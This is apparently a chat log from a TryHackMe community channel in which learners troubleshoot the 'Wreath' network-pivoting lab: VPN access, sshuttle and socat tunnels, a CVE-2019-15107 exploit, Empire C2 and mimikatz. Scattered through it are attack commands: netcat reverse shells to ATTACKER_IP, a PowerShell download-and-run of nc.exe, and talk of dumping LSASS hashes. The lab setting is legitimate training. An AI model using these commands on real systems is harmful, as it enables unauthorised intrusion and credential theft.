#wreath-network

my listener could not connect to host ip : 10.200.51.200

i am making connection using burpsuit

help me aony one

What is the task?

Task no. 20
Powershell.exe
Listening task....help me

I have an 8 day streak now but the access page is still not showing the connection pack. Any ideas on how I can troubleshoot this?

Try leaving and rejoining the room

or logging out and back in again

Hmm... left the room -> logged out -> joined the room -> then it showed the access pack.

Cool 🙂

Thanks @dry pendant !

Gave +1 Rep to @dry pendant

you're welcome 🙂

Sory for the late reply, check your request headers make sure you have the content type header in there and changed the GET method to POST

I used POST METHOD its works when i command a=whoami. But not working in a=powershell.exe------etc....

Did you add the content type header?

Oh wait

Yap.....

Did you url encode the payload?

Yap....its change color in red

I also used curl method

But failed to get reverse listening

Hmm maybe you should try another powershell payload

On like revshell.com or something

Payloadsallthethings too

Thanx bro....i will try this

Aight

Bro using curl -x post in powershell.exe. geting " "

Yeah that happnes to me too curl wont work for some reason

What did u used to set up a connection to the git server?

Socat tcp-l:firewall port tcp:attacking ip:1327

I got stuck since last 3 days

Someone help me to get out please

Dare I ask why you've called your nc nc-dark? 😆

Also, could you try to get proper screenshots please? There is no way in hell I can read that top one

Also, please don't stick your tools in the home directory. I can see that other people have done that too, but still -- it's not fair on other users of the network

i think that's the example name haha 😂

It's the name Dark used in his videos

The "use your username" instruction has obviously been taken rather literally

imitation is the sincerest form of flattery

Bit late but maybe your listener is on the wrong machine?

I mean if your payload's ip is the ip of the web server then youbdont need socat to connect

But if you wany to access the git server from your box then recommend using sshuttle instead since its like a reverse vpn

So essentially check the ip and port of the payload

Make sure youre setting it up on the roght box

@ebon tapir

Oh and you have to enable a port in the firewall too i belive

Ok maybe ignore what i said before and see id the port youre listening on is open in the firewall

Hi guys, I am trying to re-download the OVPN file for the wreath network but I get a 404 error. I also regenerated the file. Does it take a while to be available for download.

?

Thanx bro.....i am just a noob....i come here for learning.....

Thanxbro....its worked

Nice i had some similar trouble with empire this moring too

Just needed a bit of time off

Is anyone using wreath right now

Do you have a question?

@strange bison I am in the webserver but the id_rsa file just contains html and no key

Ok, so someone probably broke it on your instance

It's like 25-40 people per network

Disconnect from the network and DM me your config file please -- I can fix it for you 🙂

Hey everyone, regenerated my configuration file for Wreath, but when I go to download it, I get a 404 error. It's been like this the last 2 days. Would I need to create another THM account? Not sure why this is happening. I am able to download the openvpn file for the other rooms though. Just not for Wreath.

• I regenerated my configuration file for Wreath

try leaving and rejoining the room

ok

if that doesn't work, clear your cache and log back out/in and then try again, or try rejoining the room after that

thanks I'll try that

hope it works

I've seen a few other people report similar things. Not sure what the problem is.

thanks will let you know

I'm 50% done and I learned a massive amount

wanna finish it lol

yeah, it's a fantastic room

hmm yeah still having an issue

Not sure what is causing it

worst case I'll have to create another thm account. Not sure if it is specific to my account

I highly doubt that

if none of that works, I'd say maybe try emailing support@tryhackme.com

thanks I might do that

or see if you can choose a different vpn server maybe

Can't recall if wreath had options or not

there's only one option for VPN, it just says Wreath

is Throwback going to be similar to Wreath?

it's already out. I haven't done it. It has more boxes, focuses more on activedirectory

#743859653343182930

ok

https://tryhackme.com/network/throwback

awesome

I'm gonna do that after Wreath

Hey i need someone to explain this to me if sshuttle is like a reverse vpn and i got that connected to the web server meaning i van view the internal networks web site and indeed i can but only for .150 not for .100 question is what is blocking me from viewing the website on .100 from my machine?

There should be some form of IP whitelisting or something similar on .100, only allowing .150 to communicate.

Ahh now that makes sense

Correct

Hello there! Newbie here!

one question, I just subscribed to THM and joined wreath. The thing is that it says "9 days of access left", ¿should I worry?

No, everything is fine. People get kicked out after few days, but you can rejoin anytime again

Cool, thanks!!

Hey, may you please provide some details about how are these systems connected to form the network.
The IP whitelisting part, cannot connect to .100 and .150 directly from our machine.
I thought, I can try to figure this out in the Windows Defender Firewall for the rule WebServer by getting a RDP session on the final machine Wreath-PC.
I did a quick run :grin:

But I couldn't find much information in there.

It's all done effectively at the "router" level. You could think of it as almost three subnets with firewalls between them. You won't find anything in the machines themselves though

so all with the aws config?

amazin

Hi, I don't have access to any network even being in wreath room

So i can't continue with wreath room 😦

Leave and rejoin the room

If I leave the room will I have to do a 10 day streak again?

Nope.

Thanks for the awesome room, Muiri! It helped a good bit with the pen+ exam 🙂

Don't forget the report!

Hey guys, I am little stuck on Task 17 part 4, which host is it referring to?
A little nudge would be appreciated! 🙂

The 2 other hosts that u havent yet compromised

ahh right

so from the scan before that question?

Get nmap on the server and ip sweep them

I think I got it, I may have misread the results

ok

I used the ip sweep 10.200.72.1-255

That should be sufficient

right yeah I had at my results again and it made sense

thanks though!

Np

Hello guys, so i have been trying to recreate the Empire C2 server from the Win Server using http_hop. it worked yesterday but today when I execute the stager, it only gets the /news.php file on that GitServer machine. and nothing else. I wonder if that's a machine issue or something

Windows Powershell error

PHP server log

it got a hit, and yesterday it works fine. S o I am thinking maybe its a server issue?

Yeah probadly just go do something else and come back to it after a while

Dear God, someone is messing with the network

it's like working for like 2-3 minutes? and ssh connection is breaking and the loop goes on

who's messing?

sounds like multiple vpns

i just joined the wreath room

havent done anything yet

there are many different instances of the room also

Hi, I cant use sshuttle, command 'sshuttle -r root@10.200.99.200 -x 10.200.99.200 --ssh-cmd "ssh -i id_rsa -vvv" 10.200.99.0/24 -vvv', here is the debug message

after I change the mtu of wlan0, it returns error code 255, adding '-x' option doesn't work :"<

Is it normal to have to download a new ovpn file to reconnect to the network?

What's the question behind the question?

Like, what are you struggling with?

When I am inactive for several hours and try to continue with the room (it says it's running at the top), I can't connect to any machines and it seems my vpn connection doesn't work. I will kill that connection and try to reconnect but it won't connect unless I download a new ovpn file. Not a huge deal because it only takes a couple of minutes to get a new one but I was just wondering if anyone else has had that issue.

Yeah, I've had similar issues. But I was most of the time able to fix it by doing 'ifconfig tun0 down" + "ifconfig tun0 up"

When it seemed persistently unwilling to work properly, I used that THM Python script that does all the checks for you. There it often told me that there were two concurrent connections running. Maybe you're experiencing something similar.

Thanks, I will try both of these.

Gave +1 Rep to @tender panther

Yw. Hope it helps!

if i'm a paid user, do i still need a 7 day streak to have access?

Streak limitation is only for free users, so no

k for some reason i have no access to any networks

You should have access to wreath if you subscribed. If you want access to throwback, then you have to pay extra

i'm looking at my access panel and it says i don't have access

i still have my old ovpn file, but it doesn't connect (its from a month ago)

is there somewhere i can create a new ovpn file?

You could try to clear cache / relog

how would i do that?

im able to answer questions but i dont have access to the server? lol

got it. had to leave and rejoin

Hey!

I am getting this error ```
Load key "id_rsa": invalid format

What's the full command you used?

make sure that there is a blank line at the end of the file

Yeah Done!

Thanks Man 😄

Is Wreath down??

I am unable to connect to the network. Tried pinging too

the network goes to sleep after a while, you might have to start it back up again

I tried that.

hii can you post the IP address of one the machines on your network please? I can check to see if it's up or not

for CVE-2019-15107 (https://github.com/MuirlandOracle/CVE-2019-15107) my shell hangs when ever I type shell for rev shell, is something broken from my end?

No, it tell you to press enter when you have a netcat listener started

I couldn't press enter earlier

4? shdnt it be 5?

3306 shouldn't be publicly accessible iirc. Either someone's messed with that machine, or your nmap is throwing a false positive

That's my response from it

Hi, Are we allowed to share a complete WriteUp for Wreath?

I don't think so... did you use burp suite, because I didn't

you can submit one to the room

but the format is that of a full pentest report

I wrote a normal Write Up for my Medium Account

You'll have to ask @merry robin about that then

In terms of getting accepted to the room: no, because there are explicit instructions for it. In terms of existing, I don't mind 🤷‍♂️

Cool.

didnt find this in the cli tho

ah ok.. thanks !

Gave +1 Rep to @merry robin

What version of empire are you on? If 4.0 is publicly accessible now then that whole section needs a rewrite

3.8.2

Then that should work just fine

i didnt understand where to find the shell in HELP i couldnt find it

oh nvm am blind

sorry for the trouble

kill not working?
its the fact that am dumb but need help

Hello, I would like to know why I have no access to the Wreath network, I'm subscribed and my streak is enough

Have u joined the room?

And is ur streak 7?

If yes and u are unable to get the vpn try leaving the room and join again this should help

It worked for me, thank you

:)

Sorry for the ping

np

is something up with the network there's crazy packet loss and it's really fustrating

litterally I just started with this room and I'm running the nmap scan and the network goes down mid scan

.-.

like im doing a simple nmap scan and it's telling me i got 5 hours left ☹️

I doubt it

makes sure you don't have multiple VPNs open

nah i didnt I even rebooted

got it

When i am running the nmap on the compromised server, its throwing me an error as Permission Denied. What's wrong here ?

Sounds like you haven't made it executable @fluid shoal

ohh yeahh.. sorry my bad.. Thanks 🙂

Np 🙂

Hello i'm getting this error with socat reverse shell any idea ?

You shouldn't need to send back a reverse shell since you're already on the machine (and I think root has an id_rsa in the ssh folder?). If you're trying to pivot using socat, make sure to modify the firewall rules to allow you to use port 8888.

hi guys, when ever I try to use evil-winrm i get stuck on Info: Establishing connection to remote endpointthis line, do we know any possible reason?

evil-winrm -u sniperop -p <password> -i 10.200.71.150 -P 5985     
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint

also I am getting this error later on

error: An error of type HTTPClient::ConnectTimeoutError happened, message is execution expired

Error: Exiting with code 1

like I dont have direct connection to the git-stack machine from my machine

Of course you don't -- that's why there's pivoting involved...

yeah, i've done the pivoting

but still

i am able to get the webpage

What technique did you use to pivot?

first i used ssh port forwarding and then sshuttle

sudo sshuttle -r root@10.200.71.200 --ssh-cmd "ssh -i webserver/id_rsa" 10.200.71.0/24 -x 10.200.71.200

And that is still active?

yup

Can you nmap port 5985?

And port 80, actually

yup

Both open?

yup

Could you disconnect from the VPN and send me your config file please?

Preferably over DM so it's not in the public chat

where do I get the config file?

also

Your .ovpn file

oho k

do i just send it here or dm?

DM

I have issue with running mimikatz after getting the RDP session

It's gives error when I run privileged::debug

Any ideas how to fix it

For .150 network

Start it as an Administrator

As in, right click -> Run as Administrator

Yup I realised later

Thx anyways

Hi Guys, been having an issue since this morning. I can't reach any machine in the network, have regenerated my connection pack and the problem remains. What else can I do?

Hi Guys, Why do i get sometimes the below error while creating a reverse shell and not always ?
[*] Start a netcat listener in a new window (nc -lvnp 1563) then press enter.

[+] You should now have a reverse shell on the target
[*] If this is not the case, please check your IP and chosen port
If these are correct then there is likely a firewall preventing the reverse connection. Try choosing a well-known port such as 443 or 53

Right now i am getting this error and not able to fix this

Hey you don't have access to any network

Vpn

Wreath

Leave the room and rejoin

Try leaving the room and rejoining.

Hi Guys, I cannot see port 10000 opened on .200 server when ran a nmap scan? what might be the issue ?

PORT STATE SERVICE REASON
10000/tcp closed snet-sensor-mgmt reset ttl 63

Thank you @merry robin for all the effort you put in creating this room and all the content you managed to put in there. A long and satisfying journey!

Gave +1 Rep to @merry robin

About to start wreath, wish me luck!

Good luck!

A bit late but 4.0 was just dropped today.

https://twitter.com/BCSecurity1/status/1410623178313920520

Yep, I saw the tweet. Congrats!
I'll get an update to Wreath out ASAP

Let me know if you need any help with screenshots or walkthroughs. I'm happy to lend a hand.

Thank you! 😄

Wreath 2.0 when 😄

We'll see. Should have an Empire Section 2.0 in CMN's inbox tonight though

The Empire (4.0) Strikes Back.

👀

how get a revshell on local machine from pivoting machine using ssh remote port forwarding

Anyone else have trouble with Task 5 when adding <Target IP> thomaswreath.thm to your /etc/hosts file? The changes I’ve made are being ignored, so the website still won’t resolve. I’ve edited /etc/hosts as root and cleared my Firefox browser history and cache. I can ping/nmap the target without issue, however the connection always times out when I try to browse to it.

hey guys
i have a problem with entiring network
last task of pre security
can someone help me

I'm having trouble accessing the network too. The VPN is up with MTU at 1200 and the Wreath machines are up. but I can't ping the web server. Any thoughts?

I've left, rejoined and generated a new OVPN file too, but no change.

all good now

BTW on task 40, im having trouble uploading netcat onto wreath-pc using curl + powershell. I get a connection back but it's the file is not downloaded. Is it the anti-virus at work or something else I'm missing?

this is me getting a connection back from wreath-pc, but it's like the connection prematurely breaks or something

I've decided to work from the web shell for task 41. might change to using SMB server from impacket for uploading curl & the other exploits

Update:
Wreath has now been updated to handle Empire 4.0. The changes are live, so let us know if there are any problems!

Task 31 is new? 🙂

It must be. I completed it before that existed

😎 😄

Yessss it is!

It's apart of the new changes for Empire 4.0

It's mostly contextual as far as I can tell for the changes that we had to make

"we" me being 10% me & 90% muirl LMAO

I am forwarding port 80 of 10.200.51.150 to my 7777 localhost

but this is what i get on my broswer?

what can be the issue?

Wreath task18

Who says there's an issue?

the tasks says that a login will be displayed

Hints are useful

No, it tells you to go to the login screen

ok thanks

i save hints for the last.didnt expectedthis lolz

As a general rule, use the hints before asking for help -- they are there for a reason 🙂
Nothing wrong with asking for help, but if you do it before using everything that you've been given (and before researching for that matter), then it's not nearly as beneficial

noted

I've just finished the network. The most amazing learning I had to date!! I'm writing the report in the following weeks! Thanks A LOT @merry robin !!!

Gave +1 Rep to @merry robin

yo, i just get "ssh-rsa: command not found" in Task 11 of Wreath room.
I have to write this command but the command doesn't exist and i tried a sudo apt install ssh-rsa but it doesn't exist, any ideas ?

ping me if you have an idea

That line you’re supposed to copy and paste is supposed to prepend the public key. It’s not an actual command or tool.

Suppose I compromised a server and have ssh access. It is also connected to a second server which is in internal network. I port forward a port of the internal server and get a rce on that. Now if i start a nc listener on the first compromisesd server and then execute a shell through rce gained on internal and server. And i specify lets suppose port 6666 then i will receive a reverse shell of internal server on my ssh of first server.

Now if i do local port forwarding and forward port 6666 of server 1 on my localhost:8000 the connection should be chained back to me. My question is that If i do. nc 127.0.0.1 8000on my machine, then will i be able to get a working shell on my machine?

can any one clear this

That sounds like what the room tells you to do?

I used the relay method to get shell. On git server, but the other method which room tells is to to get a reverse shell on ssh of first machine

My question that can i forward that shell again to my machine

That's what the relay does

no option for wreath in

access

page

vpn config

Leave and rejoin the room

U will get acess to wreath vpn config file

https://i.imgur.com/L8QMUfl.png

i can't find a way to start server (maybe i'm missing something)

you've joined the room and have a 7 day streak right?

yes

but if i will leave

i again need a

7 day streak?

no

oh ok

U got the answer

I m stuck on the empire part for quite a few daYS now.Anyone else faced the same problem??

some tricky questions lol

i cant start the empire server?

Um, I'm gonna refer you to the Discord link in the pins -- see if the Empire guys know 😆

My client is running fine so it's not installation problem i think

I'm unable to run the CVE for Task 6. I've tried troubleshooting by leaving the room, re-entering it, and then re-generating my configuration file but still no luck. Any suggestions?

I should also add that I've never been able to get the website to resolve from Task 5 either, even after editing my hosts file. I just jumped to the CVE hoping that I could carry on with the lab from this point on.

try to ping the server as see if its up, if it doesn't respond it could be its down. Also whats does your /etc/hosts file entry for thomaswreath look like?

Thank you for the reply. I can ping the server just fine, no problem there. Here is the /etc/hosts file:

can you connect to it with netcat? Could just be that the network needs a reset.

I'll give nc a try the next time I take another shot at wreath, but yeah, probably time to just vote for a reset and cross my fingers. Thank you though.

Anybody else had a problem with empire-framework after installing it through apt package manager?

The empire server doesn't start

This issue

I told you, ask the BC-Security guys -- they made the thing

Finished the room. No issues with empire on my end.

I should mail them?

No, just join their discord server and ask

https://discord.com/invite/P8PZPyf

Pinned, as I said yesterday ^^

Ok

Thanks

WIll I receive the port scan back on my screen or not? Because the module section in room showed an example of sherlock module and it gave the results on the same screen

I'm having an issue getting Mimikatz to run on the Windows box; I've tried both 32 and 64 versions to the same error message (below). Anyone know why it is being so cranky?

Perhaps of note is that xfreerdp is no cooperating with me either, so instead I used RDesktop to login, hosted a py server locally, and then pulled the files over with certutil

Okay! I got Mimi working. Found a Drive Share option in 'man rdesktop' to use and with the Drive Share it works flawlessly. Still would be interested to know why the certutil avenue went so hard on its face though if anyone has any thoughts. I'm starting to wonder if pulling a file through a port relay on that intermediary machine may have compromised the file integrity or some such?

-undelete 1

Up to 10 last deleted messages (last hour or 12 hours for premium):

none...

I am connected to the gitserver through evilwinrm. I have portforwarded the gitserver port 5589 through ssh local forwarding of first webserver

ssh -L6001:10.200.51.150:5985 root@10.200.51.200 -i webserverssh NOw i access the evil-winrm shell through 127.0.0.1:6001

but i have problem uderstanding now how to to setup a proxy to connect to the personal pc

I have been stuck at this from yesterday so any help will be appreciated

1. prod-serv - 10.200.x.200
2. git-serv  - 10.200.x.150
3. wreath-pc - 10.200.x.100

You can connect to wreath-pc in a similar way as you have connected to git-serv

prod-serv is allowed to access git-serv, this is why you can access git-serv through prod-serv

So in order to access wreath-pc, you will have to somehow access it through git-serv (you may already have visualized the network connections)

Thanks to Muiri, the room is pretty clear in every task.
For example, you can use sshuttle to route traffic first through prod-serv then through git-serv and finally you get access to wreath-pc.

Gave +1 Rep to @leaden oyster

||Setup a server on git-serv to allow you access to wreath-pc.
You can use plink.exe or chisel.exe as provided in the room
Always try ping YOUR_MACHINE to check if you can access your own machine to create reverse shells||

||thanks ,btw it worked. I remote forwarded from gitserver to first webserver using chisel. Then Localforwarded using ssh to my localport||

it worked but the thing is i didnt used sshuttle because i didnt want to rely on on ssh connection so much. And yeah the room is so fun and I am learning new things

There can be multiple ways to achieve the same or at least a similar result. Muiri made me greedy to wait for a sequel😜
Why do you not want to rely on ssh?

because I think getting a ssh connection as any user would be difficult to get in real assessments

i have been preparing myself for real things from start,so i usually follow or the do's and donts just like we would do in real assesments

I got your point🙂

idk i maybe wrong ,But hey i got the thomas web running

If there's a Linux server with SSH (or less commonly a Windows machine with SSH), which wouldn't be hugely uncommon for public facing devices, then you will nearly always be able to use SSH to some extent or another.
There's a reason these tools exist.

oh nice

so stambling upon ssh credentials or private keys in real life is common?

Less common than making your own

Credentials, possibly

Private keys should never be transferred, so having the private key of a user in the box in the authorized keys file for that account would be a little... odd

Root login should also not be active

I heard that most ssh connections require private keys alongside passphrase in real networks

so credentials only will not help us in that case

Those are encrypted keys, and we can also restrict the access to specific hosts, IPs. Just like how Muiri did with this room. (cannot access a server two hops ahead)

hey quick question here, what happens to the Empire C2 when a client go offline, do we lose the client or do we just lose connection until the client comes back on?

If the victim goes offline in terms of internet then the implant will keep trying to connect back until it gets access back -- I.e. the agent will keep working once the victim regains internet (in theory)

If it goes offline in terms of switching off or restarting then the agent will die. The solution to that is setting up persistence (e.g. scheduled tasks, autorun scripts, etc)

ahh gotcha

thanks @merry robin

Gave +1 Rep to @merry robin

Np :)

How often does it take on average for Wreath to reset? It's at 11m uptime and it still says "Resetting"

Uh, not that long

Try refreshing the page @patent raven?

Ohhhh now it says its running

Thanks @merry robin

Gave +1 Rep to @merry robin

Np 🙂

One more thing

I'm trying to run the python script to get into .150 but it says "No module named requests"

When I use pip to install it, it says I already have it

"requirement already satisfied"

That's a Python2 vs Python3 thing

Try python2 -m pip install requests

Failing that, use the script I have pinned in here

Ohhhhhhh oh thanks

Now it's saying pip isn't installed

I think I only have pip3 installed

Ok I installed pip2 and installed requests and now it works, thanks again @merry robin

Gave +1 Rep to @merry robin

Np 🙂

can anyone give me a tip on how to properly setup task 18

What do you mean by "setup"? 🙂

I'm struggling with using the recommended tool to setup my connection

Screenshots would be useful

ill see what I can do, I suddenly cant even ping prod-serv anymore so idk what thats about

Happened earlier too

The network you're on is down again (it's been two hours since we got things up again in #room-help) networks are only active for 2 hours at a time unless they're restarted/started again

yeah, it says its running again

but network uptime is a dash

Mhhm I wonder why the network map / status is so unreliable atm

I'll report it to the software engineer team

That's so odd

and it makes it so I cant interact with the start, so I guess im on a 2h time out lol

Yeahhhh it sounds like it

I tried regenerating the vpn config too but didnt change it

If you were to leave the room and re-join you should be switched onto a different network

Let me test that

Yess

If you use the grey cog in the room -> leave you can join the wreath room again and it'll put you onto a new network

okay, if I do that, is my current vpn info still fine though or will I need to regen?

You won't loose your progress in terms of the answers that you've submitted already

You'll need to regen (:

okay no big deal :p thanks again @fair breach

Gave +1 Rep to @fair breach

I wonder why that network is being funky

it keeps showing me a different subnet when im not joined, then when I join its the same one

like if I leave it shows a different subnet but as soon as I rejoin, back to the original

Mhhm yeah so it seems

Okay the 121 network is resetting now, let me look at on the backend

I'm trying to run the powershell reverse shell with the python script and it's giving me a syntax error, am I not supposed to run the reverse shell through the script?

I blame Holo

quoting CMNatic

OI

figured out the problem I was having that wasnt network related, went and watched the walkthrough video for task 18, I just didnt understand how sshuttle worked basically.

Nvm I wasn't supposed to put the reverse shell into the script, me big dum dum 🙂

Ooooooookay new problem - WinRM is giving me odd errors

The error message is too long but apparently Discord can put it in a text file so thats neat

Uhhh I think Wreath died now

I can't connect to it

yeah it seems all wonky again on mine too

im going to take a break for a bit anyway I think lol

I was just about to pull the trigger on .150 too 😢

I was working on the c2 stuff lol

gonna take me a bit to reassemble that position but oh well I guess lol

Oof

I kinda just decided to try tackling this room earlier today on a whim anyway, I didnt really realize what I was getting myself into, but im glad I made it that far, ive been in big brain time for a bit on this one. Never attempted anything of this scale until now 😆

If you're on 10.200.121.* still then the machines are still up & active (:

i am but for some reason it seems like things arent working anymore

interesting

I can ping okay personally

without trying to exploit/access anything that is 😄

im on 10.200.49.x

yeah, cant ping anything, was in the middle of setting up the c2 stuff and now I cant even ping the entry point

^^^^^^

Ah yeah, the machines on 10.200.49.* are stopped atm @patent raven

Have been for about an hour it looks like?

Oh what

It says running for me

sshuttle disconnected and everything in 121

Ohhhh when I refresh it says stopped

ah

Can you ping 10.200.121.250 @uneven thorn ? that is the internal IP of the VPN server for that network

has something to do with my openvpn to thm

tyhis time

your machines are booting up now @patent raven give it a few mins to setup etc (:

Also can I use RDP for the post-exploitation on .150? I can't get evil-winrm to work on my machine

Yeah I hit start, I just had to refresh my browser lol

I personally don't know I'm afraid 😅

my openvpn is hanging for some reason

I mean it lets me do it but I'm asking because the task says to avoid it

but I can't get evil-winrm to work

TLS key negotiation failed, im going to try regen-ing again maybe?

Mhhm I don't think regenning will solve that issue

Can you try connecting to the normal THM vpn servers? i.e. using your normal ovpn file?

it worked 😆

idk, I regened, redownloaded rm old, mv new fire up openvpn, ping worked

🤷‍♂️

oh aha

nice!

😄

im having a real tough time wrapping my head around this empire thing

when I setup listeners do I use my attacker IP or do I use one of the compromised servers? how do I even use the stagers? like im on the agents part and I just cannot figure out what im supposed to be doing

Is it compulsory to learn about empire? To go ahead in wreath network

I kind of think so, im starting to get it now though

through some trial and error

where does apt install empire?

I'm having trouble locating the scripts for the ps1

found it in the tools zip

wewlad, what a ride that was. good luck everyone!

Yoo

That was actually probably one of the hardest things I've ever done. Really had to beat my head against the wall for a while there

Knew I forgot something after the big update. Will update that in a minute.
Which bits can be clarified in that section? :slight_smile:

Hi! Did anybody get the "connection refused" error when trying to connect via SSH in "Task 18 - Git server pivoting" of https://tryhackme.com/room/wreath? Do you know how to fix this to do pivoting?

Make sure the network is up

yes, it is. network is up and I am connected with IP 10.50.54.31

Wait what are you trying to ssh into?

what do you mean?

You said you were trying to connect with ssh

To what exactly

yes, i mean that i am trying to do pivoting through sshuttle. i would like to run the command ssh -i key.rsa root@10.200.98.200, so exploiting the --ssh-cmd I could do "--ssh-cmd "ssh -i key.rsa".

i am trying to run the command from my attacking machine in order to reach the webserver that is on 10.200.98.150

sshuttle -r root@10.200.98.200 --ssh-cmd "ssh -i key.rsa" 10.200.98.0/24 -x 10.200.98.200 &

Connection looks...

Fine to me

Maybe just wait around for a bit and try again?

Its weird like that sometimes

already tried from 12 a.m., something is not working. may it be an issue related with the network?

also when running ./CVE-2019-15107.py 10.200.56.200 for the exploitation task, the received error is "[-] Failed to connect to http://10.200.56.200:10000/", so host seems down!

Bruh the ip

Look at the ip

Make sure its correct

yes, it is the IP showed on the running network on THM.

Hey, sorry I ended up going to sleep, that was a long one yesterday! Maybe when getting to that part there could just be a note reminding a person that a copy of the ps1 script for Invoke-Portscan is included in the downloaded task files zip?

That was an amazing challenge tho, so glad I decided to try tackling that yesterday!

How many votes does it need for a reset (8 players)? Looks like someone deleted the private key on .200 ...

or is there someone who could provide me with said file (already got root on that machine)

It does let you vote again after an hour so technically you could just wait 8 hours...

Ahh good to know, thanks!

You shouldn't have to though

@spice coral if it's still a problem, disconnect from the VPN and DM me your config pack please :)

I'll fix the thing manually

According to Task 6 you are supposed to copy the file (/root/.ssh/id_rsa) to your attacking machine if I understood it correctly, though the file in my network is empty:

Yeah, you shouldn't have to wait 8 hours to be able to reset it again just because someone is being a dick

(Hence offering to fix it)

Is it not listing an id_rsa in that screenshot?

Yea but it's empty (the zero after the group indicates the filesize)

Oh didn't notice that, sorry!

Do we need to maintain a 7 day streak once we join the room?

No :)

All good

ur too good for humanity

Hello

I have a problem on task 21

on post explotation

I want to dump the ntlm hash for administrator

from lsas memory

with mimikatz

and when i m trying to do privilege::debug

i m getting one error

i tried with x64 and x86 too

Same error from both?

yes

never mind i got it

i had some problems with the machine bcs is very slow

No problem :) glad you got it tho!

Hi! I just joined Wreath and I see this at the top left of the page. Does this mean that after 9 days, I will no longer be able to do Wreath?

After 9 days, you'll need to rejoin the room

ahhh i see... thank you for the fast reply!!

I finally got my pivoting up and running

man this machine takes forever to respond to my revshell

Hi, can anyone help me with sshuttle. I'm working on a kali-linux machine on wsl2 in windows and I get a fatal error regarding iptables and can't figure out the issue. See screen shot. Thanks

Can someone please help me on Wreath task 20, I can't get a shell back from 10.200.90.150, ive added a firewall exception using curl POST and firewall-cmd --zone=public --add-port PORT/tcp, ive set up a socat relay on 10.200.90.200:15100, i have a nc listener on kali port 443

I've tried using both Burp and the command line, but nothing happens apart from the server returning " " and the listener still listening

Although, I did not check the "encode all special characters" when using Cyberchef, could that maybe be it?

I wans't sure if I should encode every special character or not, I'll try again but encoding all of them and see if it works better.

Feelsbadman, still no luck even after encoding all special characters

oh my god man i cant for the life of me figure it out, i thought for sure i had got it now cause I realized 1 I set up the listener on the wrong machine, instead of the webserver 2 I put in wrong port and wrong IP

but even after fixing these and following the writeup, where the command works, it still doesnt do anything

(Task 43)
Could someone explain to me why the wrapper file is called "System.exe" after copying and noc "SystemExplorerService64.exe" like the legitimate file?

hello, i am having trouble with empire on the attack box

how can i start it

It's mimicking the System directory, not the original exe

Hmm I think I got it but definitely gonna conduct some more research
Thanks for the answer

Gave +1 Rep to @merry robin

After 2 days I finished Wreath thanks Muiri for the awesome room learned quite a lot 😄

how can I run the powershell-empire on the attack box

You can try uploading nc.exe and get shell that way.

How though? I dont have a shell on the windows machine

thats what im trying to do

The one I have a full shell on is the linux machine

You have web shell right?

yaeh on the prod-serv

I can run remote commands on the windows server but for some reason it completely and absolutely REFUSES to let me get a reverse shell, I tried restarting the listener etc and follow the writeup where the command worked but still no luck for some reason

I must have messed something up surely since its obviously supposed to work but I seriously can't figure out what, the listener and firewall exception uses same port, i input the prod-serv IP for the IP part of the reverse shell command and everything but nope

ive tried using -X POST and -XPOST as well

tried with both burp and CLI

I was having trouble with powershell shell so I uploaded nc.exe binary and got a shell through it.

how did you upload it to the git-server prior to getting a shell on it though?

You can execute Windows commands through webshell so certutil or curl whichever works.

True, let me think for a moment and see if I can figure something out. Thanks for the nudge

Gave +1 Rep to @waxen orbit

Well actually one last thing

for some reason using burp is completely broken atm, so I can only do it all thru the CLI. Doing any command gives the same response as a blank command, but since CLI works its not really an issue

Thank you again 🙂

It should work with Burp too. Make sure to use post request.

Yep using POST, tripple checked that everything was correct, it worked until it suddenly didnt anymore

Show burp request screenshot.

One sec

Doing powershell.exe -c "curl kali-ip/nc.exe ; nc.exe (after cping it to the directroy) didn't work unfortunately by the way. It stood still for a moment before returning " "

Actually let me try with a fresh burp intercept because I ended up closing the window

Request

Response

Try running it with sudo. I know that sshuttle can be a little bit finnicky, especially if the network just started up, so just keep trying it. Your syntax looks fine.

Just type whoami no powershell.exe.

a=whoami

I am at task 42 where we get full shell back from Pc(3rd server). The task says to execute powershell.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe and I am getting a shell back. But if I execute same command but with cmd.exe i dont get a shell back. cmd.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe. Like this

This is what i get in my browser when i run with cmd.exe and dont get shell back in my nc listener

what can be the reason i want to ask?SHouldnt it work with cmd.exe too

Sure one sec.

I might have realized what the problem is, I think I forgot to create a Socat relay to forward the shell prior to running the powershell exploit command. Imma try setting one up again, but I have a question, if I set up a port exception on port 17010 on the CentOS firewall, should I use port 17010 for both the netcat listener and the relay? Im slightly confused how im gonna syntax the relay to make it work

So to add some context, in the Wreath example for the Socat relay, port 443 is used for the netcat listener catching the relay shell. Should I change that to 17010 in this case?

And again, in the example, port 8000 is used for the socat relay listener, should I change that to 17010?

I still haven't completely wrapped my head around the syntax for the port tunneling tools

no luck so far ughhhh why cant i catch this shell, maaaan

hey at least its realistic now i guess

You know what I think its gonna work this time using nc.exe, gonna give it another try

Can't get it to curl

It gave the same response. For some reason the date on the response is stuck, its like two hours behind

Use the firewall port which you opened.

yep tried that, for some reason still not working. Should I leave the other ports the same or use 17010 for all of them?

What I did is uploaded nc.exe to .200 machine and then launched http server there and grabbed it from prod machine.

Okay, can you execute commands through web shell? Like does whoami command works?

yep whoami, powershell pwd etc works fine its just this shell command that wont work for some reason

Ooh let me try that, I tried curling it from my attacking machine

which come to think of it

wont work because .150 cant access my kali machine

You need to open firewall port for http server port otherwise prod-serv machine cannot connect to it iirc.

Alright, ill give that a try. So if I open the http server on prod server on port 4242, ill add an exception using the same firewalld command, but using port 4242?

Yup.

alright got it, thanks! Ill give it a shot, one sec

Lmk if it works or not.

of course!

Whats up with this? for some reason the netcat relay has broke now too

this machine slowly but surely makes sure each step of this process works backwards, each step taking a working process with it

There's no jobs running, so not sure why it's in use

maybe another user?

Wait, do I even need the relay if I use nc.exe?

Process is already running in background. Kill it.

Yup.

theres no jobs tho

or is it under ps aux?

yes it is

yep that fixed it, let me give nc.exe a try now. One moment

Did not work

Curling it to the 150 machine worked flawlessly though

but executing the .exe did not give a shell

used this command

Is netcat uploaded?

yep its there if i run powershell ls

so that part worked

Why 127.0.0.1?

Also, no /bin/bash cause its a windows machine.

that was what was used in the socat relay example so I tried that, should it be the prod serv?

can i just remove that part entirely?

the -e one that is

Use cmd.exe instead /bin/bash.

Alright, one sec!

No luck, I used the IP for prod-serv instead of localhost, together with port 17010 like the exception I set up in the firewall

Show command without url encoding.

